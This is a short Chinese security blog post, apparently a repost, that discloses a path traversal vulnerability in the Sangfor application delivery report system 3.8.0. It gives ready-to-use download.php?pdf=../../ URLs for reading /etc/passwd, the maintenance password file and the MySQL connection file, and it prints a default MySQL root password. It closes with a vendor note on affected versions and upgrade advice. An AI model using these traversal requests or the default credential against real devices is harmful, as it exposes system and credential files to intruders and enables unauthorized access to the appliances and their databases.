提醒:利用此漏洞进行非法入侵与本站无关,建议大家在授权的条件下测试。

 Author: 7z1

版本:SANGFOR-AD-3.8.0 (深信服应用交付报表系统3.8.0)

下载漏洞

http://www.site.cn:85/report/download.php?pdf=../../../../../etc/passwd

深信服后台维护密码获取:

http://www.site.cn:85/report/download.php?pdf=../../../../..//etc/updateme/passwd

深信服应用交付报表系统MYSQL数据库账户获取:

http://www.site.cn:85/report/download.php?pdf=../../../../..//app/usr/web/wwwroot/report/condb/conn_mysql.php

一般默认MYSQL账户密码 ($con = mysql_connect(“localhost”,”root”,”sinfors”); )

获取跟远端通信的端口

http://www.site.cn:85/report/download.php?pdf=../../../../..//app/usr/web/wwwroot/report/include/gfad_get_remote_data.php

原文:http://www.1990day.com/index.php/0days/19.html

———————————————–

新浪微博的@lzhi 告诉游侠:

目前深信服该漏洞只在3.8版本以下存在,目前提供给到客户的应用交付版本为4.2.针对该漏洞的补丁会在近期提供。

游侠提醒:

未升级的客户请自行联系深信服升级。

其实,安全产品出现漏洞也是常事,一些国际大厂也不能避免。并且一般人也并不知道设备的IP地址,因此无需恐慌!

作者 网路游侠

游侠安全网,前身为网路游侠的信息与网络安全博客,站长张百川。专注:网络安全、系统安全、应用安全、数据库安全、运维安全,及网络安全、信息安全前沿技术研究与发展趋势分析。对关键信息基础设施安全防护管理平台、网络安全态势感知平台、网络安全协调指挥平台有一定关注。